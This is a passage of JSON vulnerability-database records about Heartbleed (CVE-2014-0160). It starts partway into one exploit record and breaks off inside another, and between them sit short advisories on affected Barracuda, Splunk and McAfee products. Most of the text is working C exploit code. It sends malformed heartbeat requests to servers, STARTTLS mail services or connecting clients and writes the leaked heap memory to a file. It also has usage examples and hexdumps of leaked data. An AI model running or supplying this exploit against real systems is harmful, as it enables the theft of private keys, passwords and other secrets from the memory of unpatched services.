(size_t)mac_size) != 0)\r\n enc_err = -1;\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size)\r\n enc_err = -1;\r\n }\r\n if(enc_err < 0){\r\n al=SSL_AD_BAD_RECORD_MAC;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\r\n goto apple;\r\n }\r\n if(s->expand != NULL){\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n if (!ssl3_do_uncompress(s)) {\r\n al=SSL_AD_DECOMPRESSION_FAILURE;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\r\n goto apple;\r\n }\r\n }\r\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n rr->off=0;\r\n s->packet_length=0;\r\n\tif(first==0){\r\n\t\tuint heartbleed_len = 0;\r\n\t\tchar* fp = s->s3->rrec.data;\r\n\t\t(long)fp++;\r\n\t\tmemcpy(&heartbleed_len,fp,2);\r\n\t\theartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\r\n\t\tfirst = 2;\r\n\t\tleakbytes = heartbleed_len + 16;\r\n\t\tprintf("[ heartbleed leaked length=%u\\n",heartbleed_len);\r\n\t}\r\n\tif(verbose==1){\r\n\t\t{ unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\\n'); }\r\n printf("\\n");\r\n }\r\n\tleakbytes-=rr->length;\r\n\tif(leakbytes > 0){\r\n\t\trepeat = 1;\r\n\t}\r\n\telse{\r\n\t\trepeat = 0;\r\n\t}\r\n\tprintf("[ final record type=%d, length=%u\\n", rr->type, rr->length);\r\n\tint output = s->s3->rrec.length-3;\r\n\tif(output > 0){\r\n\t\tint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\r\n\t if(first==2){\r\n\t\t\tfirst--;\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\t/* first three bytes are resp+len */\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length-3,filename);\r\n\t\t}\r\n\t\telse{\r\n\t\t\t/* heap data & 16 bytes padding */\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length,filename);\r\n\t\t}\r\n\t\tclose(fd);\r\n\t}\r\n\telse{\r\n\t\tprintf("[ nothing from the heap to write\\n");\r\n\t}\r\n\treturn;\r\napple:\r\n printf("[ problem handling SSL record packet - wrong type?\\n");\r\n\tbadpackets++;\r\n\tif(badpackets > 3){\r\n\t\tprintf("[ error: too many bad packets recieved\\n");\r\n\t\texit(0);\r\n\t}\r\n\treturn;\r\n}\r\n\r\nvoid usage(){\r\n\tprintf("[\\n");\r\n\tprintf("[ --server|-s <ip/dns> - the server to target\\n");\r\n\tprintf("[ --port|-p <port> - the port to target\\n");\r\n\tprintf("[ --file|-f <filename> - file to write data to\\n");\r\n\tprintf("[ --bind|-b <ip> - bind to ip for exploiting clients\\n");\r\n\tprintf("[ --precmd|-c <n> - send precmd buffer (STARTTLS)\\n");\r\n\tprintf("[\t\t\t 0 = SMTP\\n");\r\n\tprintf("[\t\t\t 1 = POP3\\n");\r\n\tprintf("[\t\t\t 2 = IMAP\\n");\r\n\tprintf("[ --loop|-l\t\t - loop the exploit attempts\\n");\r\n\tprintf("[ --type|-t <n> - select exploit to try\\n");\r\n\tprintf("[ 0 = null length\\n");\r\n\tprintf("[\t\t\t 1 = max leak\\n");\r\n\tprintf("[\t\t\t n = heartbeat payload_length\\n");\r\n\tprintf("[\\n");\r\n\tprintf("[ --verbose|-v - output leak to screen\\n");\r\n\tprintf("[ --help|-h - this output\\n");\r\n\tprintf("[\\n");\r\n\texit(0);\r\n}\r\n\r\nint main(int argc, char* argv[]){\r\n\tint ret, port, userc, index;\r\n\tint type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9;\r\n\tint loop = 0;\r\n\tstruct hostent *h;\r\n\tconnection* c;\r\n\tchar *host, *file;\r\n\tint ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;\r\n\tprintf("[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\n");\r\n\tprintf("[ =============================================================\\n");\r\n static struct option options[] = {\r\n \t{"server", 1, 0, 's'},\r\n\t {"port", 1, 0, 'p'},\r\n\t\t{"file", 1, 0, 'f'},\r\n\t\t{"type", 1, 0, 't'},\r\n\t\t{"bind", 1, 0, 'b'},\r\n\t\t{"verbose", 0, 0, 'v'},\r\n\t\t{"precmd", 1, 0, 'c'},\r\n\t\t{"loop", 0, 0, 'l'},\r\n\t\t{"help", 0, 0,'h'}\r\n };\r\n\twhile(userc != -1) {\r\n\t userc = getopt_long(argc,argv,"s:p:f:t:b:c:lvh",options,&index);\t\r\n \tswitch(userc) {\r\n \t\tcase -1:\r\n\t break;\r\n \t case 's':\r\n\t\t\t\tif(ihost==0){\r\n\t\t\t\t\tihost = 1;\r\n\t\t\t\t\th = gethostbyname(optarg);\t\t\t\t\r\n\t\t\t\t\tif(h==NULL){\r\n\t\t\t\t\t\tprintf("[!] FATAL: unknown host '%s'\\n",optarg);\r\n\t\t\t\t\t\texit(1);\r\n\t\t\t\t\t}\r\n\t\t\t\t\thost = malloc(strlen(optarg) + 1);\r\n\t\t\t\t\tif(host==NULL){\r\n \t\t\t\tprintf("[ error in malloc()\\n");\r\n\t\t\t\t exit(0);\r\n \t\t\t\t}\r\n\t\t\t\t\tsprintf(host,"%s",optarg);\r\n \t\t\t}\r\n\t\t\t\tbreak;\r\n\t case 'p':\r\n\t\t\t\tif(iport==0){\r\n\t\t\t\t\tport = atoi(optarg);\r\n\t\t\t\t\tiport = 1;\r\n\t\t\t\t}\r\n \t break;\r\n\t\t\tcase 'f':\r\n\t\t\t\tif(ifile==0){\r\n\t\t\t\t\tfile = malloc(strlen(optarg) + 1);\r\n\t\t\t\t\tif(file==NULL){\r\n\t\t\t\t printf("[ error in malloc()\\n");\r\n \t\t\t\texit(0);\r\n \t\t\t\t}\r\n\t\t\t\t\tsprintf(file,"%s",optarg);\r\n\t\t\t\t\tifile = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 't':\r\n\t\t\t\tif(itype==0){\r\n\t\t\t\t\ttype = atoi(optarg);\r\n\t\t\t\t\titype = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'h':\r\n\t\t\t\tusage();\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'b':\r\n\t\t\t\tif(ihost==0){\r\n\t\t\t\t\tihost = 1;\r\n\t\t\t\t\thost = malloc(strlen(optarg)+1);\r\n\t\t\t\t\tif(host==NULL){\r\n\t\t\t \t printf("[ error in malloc()\\n");\r\n\t\t\t\t exit(0);\r\n\t\t\t\t }\r\n\t\t\t\t\tsprintf(host,"%s",optarg);\r\n\t\t\t\t\tbind = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'c':\r\n\t\t\t\tif(iprecmd == 0){\r\n\t\t\t\t\tiprecmd = 1;\r\n\t\t\t\t\tprecmd = atoi(optarg);\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'v':\r\n\t\t\t\tverbose = 1;\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'l':\r\n\t\t\t\tloop = 1;\r\n\t\t\t\tbreak;\r\n\t\t\tdefault:\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\tif(ihost==0||iport==0||ifile==0||itype==0||type < 0){\r\n\t\tprintf("[ try --help\\n");\r\n\t\texit(0);\r\n\t}\r\n\tssl_init();\r\n\tif(bind==0){\r\n\t\tret = tcp_connect(host, port);\r\n\t\tpre_cmd(ret, precmd, verbose);\r\n\t\tc = tls_connect(ret);\r\n\t\theartbleed(c,type);\r\n\t\twhile(repeat==1){\r\n\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t}\r\n\t\twhile(loop==1){\r\n\t\t\tprintf("[ entered heartbleed loop\\n");\r\n\t\t\tfirst=0;\r\n\t\t\trepeat=1;\r\n\t\t\theartbleed(c,type);\r\n\t\t\twhile(repeat==1){\r\n\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t}\r\n\t\t}\r\n\t\tprintf("[ done.\\n");\r\n\t\texit(0);\r\n\t}\r\n\telse{\r\n\t\tint sd, pid, i;\r\n\t\tret = tcp_bind(host, port);\r\n\t\twhile(1){\r\n \t\t\tsd=accept(ret,0,0);\r\n\t\t\tif(sd==-1){\r\n\t\t\t\tprintf("[!] FATAL: problem with accept()\\n");\r\n\t\t\t\texit(0);\r\n\t\t\t}\r\n\t\t\tif(pid=fork()){\r\n\t\t\t\tclose(sd);\r\n\t\t\t}\r\n \t\t\telse{\r\n\t\t\t\tc = tls_bind(sd);\r\n\t\t\t\tpre_cmd(ret, precmd, verbose);\r\n\t\t\t\theartbleed(c,type);\r\n\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t\t}\r\n\t\t\t\twhile(loop==1){\r\n\t\t\t\t\tprintf("[ entered heartbleed loop\\n");\r\n\t\t\t\t\tfirst=0;\r\n\t\t\t\t\trepeat=0;\r\n\t\t\t\t\theartbleed(c,type);\r\n\t\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\tprintf("[ done.\\n");\r\n\t\t\t\texit(0);\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-86061"}, {"lastseen": "2017-11-19T17:26:16", "bulletinFamily": "exploit", "description": "CVE ID:CVE-2014-0160\r\n\r\nBarracuda\u591a\u4e2a\u4ea7\u54c1\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\r\n\r\nBarracuda\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nBarracuda CudaTel Communication Server 2.x\r\nBarracuda CudaTel Communication Server 3.x\r\nBarracuda Firewall 6.x\r\nBarracuda Link Balancer 2.x\r\nBarracuda Load Balancer\r\nBarracuda Load Balancer 4.x\r\nBarracuda Load Balancer ADC 5.x\r\nBarracuda Message Archiver\r\nBarracuda Message Archiver 3.x\r\nBarracuda Web Application Firewall 7.x\r\nBarracuda Web Filter\r\nBarracuda Web Filter 7.x\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6f0f\u6d1e\uff0c\u8bf7\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttps://www.barracuda.com/blogs/pmblog?bid=2279", "modified": "2014-04-16T00:00:00", "published": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62181", "id": "SSV:62181", "title": "Barracuda\u591a\u4e2a\u4ea7\u54c1OpenSSL TLS/DTLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:27:54", "bulletinFamily": "exploit", "description": "CVE ID:CVE-2014-0160\r\n\r\nSplunk\u662f\u673a\u5668\u6570\u636e\u7684\u5f15\u64ce\u3002\u4f7f\u7528Splunk\u53ef\u6536\u96c6\u3001\u7d22\u5f15\u548c\u5229\u7528\u6240\u6709\u5e94\u7528\u7a0b\u5e8f\u3001\u670d\u52a1\u5668\u548c\u8bbe\u5907\uff08\u7269\u7406\u3001\u865a\u62df\u548c\u4e91\u4e2d\uff09\u751f\u6210\u7684\u5feb\u901f\u79fb\u52a8\u578b\u8ba1\u7b97\u673a\u6570\u636e\u3002\r\n\r\nSplunk\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\n0\nSplunk 6.x\nSplunk 6.0.3\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.splunk.com", "modified": "2014-04-16T00:00:00", "published": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62198", "id": "SSV:62198", "title": "Splunk OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:26:30", "bulletinFamily": "exploit", "description": "CVE ID:CVE-2014-0160\r\n\r\nMcAfee Email Gateway\u662f\u4e00\u6b3e\u5168\u9762\u7684\u7535\u5b50\u90ae\u4ef6\u5b89\u5168\u89e3\u51b3\u65b9\u6848\u3002\r\n\r\nMcAfee Email Gateway\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nMcAfee Email Gateway 7.x\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6f0f\u6d1e\uff0c\u8bf7\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttps://kc.mcafee.com/corporate/index?page=content&id=SB10071", "modified": "2014-04-16T00:00:00", "published": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62192", "id": "SSV:62192", "title": "McAfee Email Gateway OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:26:53", "bulletinFamily": "exploit", "description": "CVE ID:CVE-2014-0160\r\n\r\nMcAfee Endpoint Intelligence Agent\u662f\u4e00\u6b3eMcAfee\u4ea7\u54c1\u4e2d\u6240\u4f7f\u7528\u7684\u4e00\u4e2a\u7f51\u7edc\u670d\u52a1\u3002 \r\n\r\nMcAfee Endpoint Intelligence Agent\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nMcAfee Endpoint Intelligence Agent 1.x (Formerly Network Integrity Agent)\nMcAfee Endpoint Intelligence Agent 2.2.1\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.mcafee.com", "modified": "2014-04-21T00:00:00", "published": "2014-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62238", "id": "SSV:62238", "title": "McAfee Endpoint Intelligence Agent OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:10:46", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86255", "id": "SSV:86255", "title": "Heartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support", "type": "seebug", "sourceData": "\n /* \r\n* CVE-2014-0160 heartbleed OpenSSL information leak exploit\r\n* =========================================================\r\n* This exploit uses OpenSSL to create an encrypted connection\r\n* and trigger the heartbleed leak. The leaked information is\r\n* returned within encrypted SSL packets and is then decrypted \r\n* and wrote to a file to annoy IDS/forensics. The exploit can \r\n* set heartbeat payload length arbitrarily or use two preset \r\n* values for NULL and MAX length. The vulnerability occurs due \r\n* to bounds checking not being performed on a heap value which \r\n* is user supplied and returned to the user as part of DTLS/TLS \r\n* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to \r\n* 1.0.1f are known affected. You must run this against a target \r\n* which is linked to a vulnerable OpenSSL library using DTLS/TLS.\r\n* This exploit leaks upto 65532 bytes of remote heap each request\r\n* and can be run in a loop until the connected peer ends connection.\r\n* The data leaked contains 16 bytes of random padding at the end.\r\n* The exploit can be used against a connecting client or server,\r\n* it can also send pre_cmd's to plain-text services to establish\r\n* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients\r\n* will often forcefully close the connection during large leak\r\n* requests so try to lower your payload request size. \r\n*\r\n* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g \r\n*\r\n* E.g.\r\n* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed\r\n* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ connecting to 192.168.11.23 443/tcp\r\n* [ connected to 192.168.11.23 443/tcp\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=65535\r\n* [ final record type=24, length=16384\r\n* [ wrote 16381 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=42\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=18\r\n* [ wrote 18 bytes of heap to file 'out'\r\n* [ done.\r\n* $ ls -al out\r\n* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out\r\n* $ hexdump -C out\r\n* - snip - snip \r\n*\r\n* Use following example command to generate certificates for clients.\r\n*\r\n* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\\r\n* -keyout server.key -out server.crt\r\n*\r\n* Debian compile with "gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\\r\n* -lssl -Wl,-Bdynamic -lssl3 -lcrypto" \r\n*\r\n* todo: add udp/dtls support.\r\n*\r\n* - Hacker Fantastic\r\n* http://www.mdsec.co.uk\r\n*\r\n*/\r\n\r\n/* Modified by Ayman Sagy aymansagy @ gmail.com - Added DTLS over UDP support\r\n*\r\n* use -u switch, tested against s_server/s_client version 1.0.1d\r\n* \r\n* # openssl s_server -accept 990 -cert ssl.crt -key ssl.key -dtls1\r\n* ...\r\n* # ./heartbleed -s 192.168.75.235 -p 990 -f eshta -t 1 -u\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=1392\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=1336\r\n* [ final record type=24, length=1355\r\n* [ wrote 1352 bytes of heap to file 'eshta'\r\n* \r\n* \r\n* # hexdump -C eshta \r\n* 00000000 00 00 00 00 06 30 f1 95 08 00 00 00 00 00 00 00 |.....0..........|\r\n* 00000010 8c 43 64 ab e3 89 6b fd e3 d3 74 a1 a1 31 8c 35 |.Cd...k...t..1.5|\r\n* 00000020 09 6d b9 e7 08 08 08 08 08 08 08 08 08 a1 65 9f |.m............e.|\r\n* 00000030 ca 13 80 7c a5 88 b0 c9 d5 f6 7b 14 fe ff 00 00 |...|......{.....|\r\n* 00000040 00 00 00 00 00 03 00 01 01 16 fe ff 00 01 00 00 |................|\r\n* 00000050 00 00 00 00 00 40 b5 fd a5 10 da c4 fd fb c7 d2 |.....@..........|\r\n* 00000060 9f 0c 56 4b a9 9c 14 00 00 0c 00 03 00 00 00 00 |..VK............|\r\n* 00000070 00 0c 69 ec c4 d5 f3 38 ae e5 2e 3a 1a 32 f9 30 |..i....8...:.2.0|\r\n* 00000080 7f 61 4c 8c d7 34 f3 02 08 3f 68 01 a9 a7 81 55 |.aL..4...?h....U|\r\n* 00000090 01 c9 03 03 03 03 00 00 0e 31 39 32 2e 31 36 38 |.........192.168|\r\n* 000000a0 2e 37 35 2e 32 33 35 00 23 00 00 00 0f 00 01 01 |.75.235.#.......|\r\n* 000000b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n*\r\n* 00000530 00 00 00 00 00 00 00 00 a5 e2 f5 67 d6 23 85 49 |...........g.#.I|\r\n* 00000540 b3 cc ed c4 d2 74 c8 97 c1 b4 cc |.....t.....|\r\n* 0000054b\r\n* \r\n* \r\n* # openssl s_client -connect localhost:990 -dtls1\r\n* ...\r\n* # ./heartbleed -b localhost -p 990 -u -t 1 -f eshta\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ SSL connection using AES256-SHA\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=1392\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=1336\r\n* [ final record type=24, length=1355\r\n* [ wrote 1352 bytes of heap to file 'eshta'\r\n* \r\n* \r\n* # hexdump -C eshta \r\n* 00000000 00 00 24 4e b7 00 00 00 00 00 00 00 00 18 00 00 |..$N............|\r\n* 00000010 cf d0 5f df c3 64 5f 58 79 17 f8 f7 22 9b 28 6e |.._..d_Xy...".(n|\r\n* 00000020 c0 e7 d6 a3 08 08 08 08 08 08 08 08 08 9b c3 38 |...............8|\r\n* 00000030 2b 32 5f dd 3a d5 0f 83 51 02 2f 70 33 8f cf 82 |+2_.:...Q./p3...|\r\n* 00000040 21 5b cc 25 80 26 f3 29 c8 90 91 ec 5c 83 68 ee |![.%.&.)....\\.h.|\r\n* 00000050 6b 11 0d ad f1 f4 da 9e 13 59 8f 2a 74 f6 d4 35 |k........Y.*t..5|\r\n* 00000060 9e 17 12 7c 2b 6f 9e a8 1e b4 7a 3c a5 ec 18 e0 |...|+o....z<....|\r\n* 00000070 44 b2 51 e4 69 8c 47 29 39 fb 9e b0 dd 5b 05 4d |D.Q.i.G)9....[.M|\r\n* 00000080 db 11 06 7b 1d 08 58 60 ac 34 3f 2d d1 14 c1 b7 |...{..X`.4?-....|\r\n* 00000090 d5 08 59 73 16 28 f8 75 23 f7 85 27 48 be 1f 14 |..Ys.(.u#..'H...|\r\n* 000000a0 fe ff 00 00 00 00 00 00 00 04 00 01 01 16 fe ff |................|\r\n* 000000b0 00 01 00 00 00 00 00 00 00 40 62 1c 02 19 45 5f |.........@b...E_|\r\n* 000000c0 2c a6 89 95 d2 bf 16 c4 8b b7 14 00 00 0c 00 04 |,...............|\r\n* 000000d0 00 00 00 00 00 0c e9 fb 75 02 61 90 be 4d f7 82 |........u.a..M..|\r\n* 000000e0 06 d6 fd 6d 53 a1 d5 44 e0 5a 0d 6a 6a 94 ef e8 |...mS..D.Z.jj...|\r\n* 000000f0 4c 01 4b cb 86 73 03 03 03 03 2d 53 74 61 74 65 |L.K..s....-State|\r\n* 00000100 31 21 30 1f 06 03 55 04 0a 0c 18 49 6e 74 65 72 |1!0...U....Inter|\r\n* 00000110 6e 65 74 20 57 69 64 67 69 74 73 20 50 74 79 20 |net Widgits Pty |\r\n* 00000120 4c 74 64 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 |Ltd0.."0...*.H..|\r\n* 00000130 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 |...........0....|\r\n* 00000140 82 01 01 00 c0 85 26 4a 9d cd f8 5e 46 74 fa 89 |......&J...^Ft..|\r\n* 00000150 e3 7d 58 76 23 ba ba dc b1 35 98 35 a5 ba 53 a1 |.}Xv#....5.5..S.|\r\n* 00000160 5b 37 28 fe f7 d0 02 fc fd c9 e3 b1 ee e6 fe 79 |[7(............y|\r\n* 00000170 86 f8 81 1a 29 29 a9 81 95 1c c9 5c 81 a2 e8 0c |....)).....\\....|\r\n* 00000180 35 b7 cb 67 8a ec 2a d1 73 e6 70 78 53 c8 50 91 |5..g..*.s.pxS.P.|\r\n* 00000190 49 07 db e1 a4 08 7b fb 07 54 48 85 45 c2 38 71 |I.....{..TH.E.8q|\r\n* 000001a0 6a 8a f2 4d a7 ba 1a 86 36 a2 ae bb a1 e1 7c 2c |j..M....6.....|,|\r\n* 000001b0 12 04 ce e5 d1 75 24 94 1c 31 2c 46 b7 76 30 3a |.....u$..1,F.v0:|\r\n* 000001c0 04 79 2f b3 65 74 fb ae c7 10 a5 da a8 2d b6 fd |.y/.et.......-..|\r\n* 000001d0 cf f9 11 fe 38 cd 25 7e 13 75 14 1d 58 92 bb 3f |....8.%~.u..X..?|\r\n* 000001e0 8f 75 d5 52 f7 27 66 ca 5d 55 4d 0a b5 71 a2 16 |.u.R.'f.]UM..q..|\r\n* 000001f0 3e 01 af 97 93 eb 5c 3f e0 fa c8 61 2c a1 87 8f |>.....\\?...a,...|\r\n* 00000200 60 d4 df 5d 9d cd 0f 34 a9 66 6c 93 d8 5f 4a 2b |`..]...4.fl.._J+|\r\n* 00000210 fd 67 3a 2f 88 90 b4 e9 f5 d6 ee bb 7d 8b 1c e5 |.g:/........}...|\r\n* 00000220 f2 cc 4f b2 c0 dc e8 1b 4c 6e 51 c9 47 8b 6c 82 |..O.....LnQ.G.l.|\r\n* 00000230 f9 4b ae 01 a8 f9 6c 6d d5 1a d5 cf 63 f4 7f e0 |.K....lm....c...|\r\n* 00000240 96 54 3f 7d 02 03 01 00 01 a3 50 30 4e 30 1d 06 |.T?}......P0N0..|\r\n* 00000250 03 55 1d 0e 04 16 04 14 af 97 4e 87 62 8a 77 b8 |.U........N.b.w.|\r\n* 00000260 b4 0b 24 20 35 b1 66 09 55 3f 74 1d 30 1f 06 03 |..$ 5.f.U?t.0...|\r\n* 00000270 55 1d 23 04 18 30 16 80 14 af 97 4e 87 62 8a 77 |U.#..0.....N.b.w|\r\n* 00000280 b8 b4 0b 24 20 35 b1 66 09 55 3f 74 1d 30 0c 06 |...$ 5.f.U?t.0..|\r\n* 00000290 03 55 1d 13 04 05 30 03 01 01 ff 30 0d 06 09 2a |.U....0....0...*|\r\n* 000002a0 86 48 86 f7 0d 01 01 05 05 00 03 82 01 01 00 b0 |.H..............|\r\n* 000002b0 8e 40 58 2d 86 32 95 11 a7 a1 64 1d fc 08 8d 87 